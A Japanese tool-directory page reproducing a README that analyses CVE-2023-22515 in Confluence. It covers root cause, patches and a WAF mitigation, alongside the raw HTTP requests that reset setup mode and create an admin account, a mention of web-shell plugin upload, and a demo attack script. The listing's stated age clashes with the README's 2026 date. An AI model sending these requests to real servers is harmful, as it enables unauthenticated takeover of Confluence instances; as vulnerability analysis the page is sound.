Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2023-22515-1 — CVE-2023-22515 の技術的分析と概念実証エクスプロイト。これは Atlassian Confluence における重大なアクセス制御の破損脆弱性であり、未認証の管理者アカウント作成とシステム侵害を可能にします。 | Kitploit
ツール/GitHubGitHub/dkq-k/cve-2023-22515-1
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubdkq-k/cve-2023-22515-1

cve-2023-22515-1

CVE-2023-22515 の技術的分析と概念実証エクスプロイト。これは Atlassian Confluence における重大なアクセス制御の破損脆弱性であり、未認証の管理者アカウント作成とシステム侵害を可能にします。

リポジトリを見る
68ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2023-22515: Confluence 権限昇格脆弱性 詳細分析

[!IMPORTANT] 緊急セキュリティ警告: この脆弱性はCVSSスコア**10.0 (Critical)**の最高リスク脆弱性です。影響を受けるバージョンを使用している場合は、即座にパッチを適用する必要があります。

1. 概要 (Overview)

CVE-2023-22515は、Atlassian Confluence Data CenterおよびServerで発見された致命的なBroken Access Control脆弱性です。攻撃者は認証なしでリモートからサーバーの設定状態を操作し、管理者アカウントを作成してシステムを完全に掌握できます。

項目詳細内容
脆弱性IDCVE-2023-22515
リスク度CRITICAL (CVSS 10.0)
影響バージョン8.0.0 ~ 8.5.1 (詳細バージョン確認必要)
攻撃タイプ認証バイパス及び権限昇格

2. 攻撃メカニズム (Attack Mechanism)

この脆弱性は、攻撃者が/server-info.actionエンドポイントを介してbootstrapStatusProvider.applicationConfig.setupCompleteの値をfalseに変更することでトリガーされます。

🔍 攻撃シーケンス図

sequenceDiagram
    participant Attacker as 😈 攻撃者
    participant Server as 🖥️ Confluence サーバー
    participant Config as ⚙️ 設定管理者

    Note over Attacker, Server: 1段階: 設定状態初期化攻撃
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: メモリ上の設定完了フラグ解除
    Config-->>Server: 状態変更完了 (インストールモードに切り替え)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: 2段階: 管理者アカウント作成
    Attacker->>Server: POST /setup/setupadministrator.action<br/>(新しい管理者情報送信)
    Server->>Server: セキュリティ検証バイパス (インストールモードのため許可)
    Server-->>Attacker: アカウント作成成功およびログイン

    Note over Attacker, Server: 3段階: システム掌握 (RCE)
    Attacker->>Server: 悪性プラグインアップロード (Web Shell)
    Server-->>Attacker: リモートコマンド実行権限取得

[!NOTE] 核心原理: 永続的な設定ファイル(confluence.cfg.xml)を修正するのではなく、メモリ上のランタイム状態を変更してアクセス制御ロジックをバイパスする方式です。

3. 詳細分析 (Technical Analysis)

原因 (Root Cause)

XWork2フレームワークのパラメータバインディング脆弱性と、Confluenceのアクションクラス(ServerInfoAction)において機密属性(setupComplete)に対する外部入力検証が欠落していたために発生しました。

HTTPリクエスト例

攻撃者は単純なHTTPリクエストだけでサーバーを無力化できます。

1. 設定初期化リクエスト:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com

2. 管理者作成リクエスト:

POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...

4. 脆弱性再現 (PoC & Demo)

本レポートとともに提供される再現キット(cve-2023-22515-repro)を通じて、安全なDocker環境で脆弱性を実践できます。

🎥 シネマティックデモ

端末で実際のハッキング過程を視覚的に確認できるデモスクリプトが含まれています。

# デモ実行コマンド
bash cinematic_pwn.sh

[!TIP] デモスクリプトは実際のサーバー(localhost:8090)に対して攻撃を実行し、管理者アカウントを作成してログインまで試みる全過程を自動化して表示します。

5. 対応策 (Mitigation)

✅ 最新パッチ適用 (推奨)

最も確実な解決策は、Atlassianが提供する修正済みバージョンにアップグレードすることです。

  • 8.3.3 バージョン以上
  • 8.4.3 バージョン以上
  • 8.5.2 バージョン以上

⚠️ 一時緩和措置

パッチが難しい場合は、ネットワークセキュリティ機器(WAF、ロードバランサーなど)で次のURLパターンへのアクセスをブロックしてください。

  • */setup/*

6. 結論 (Conclusion)

CVE-2023-22515は攻撃難易度が非常に低く、かつシステム完全掌握が可能な致命的な脆弱性です。セキュリティ担当者は直ちにパッチを適用し、侵害事故の有無を監視する必要があります。


作成日: 2026-01-16 | 作成者: Antigravity Security Analysis Team

ツールをダウンロード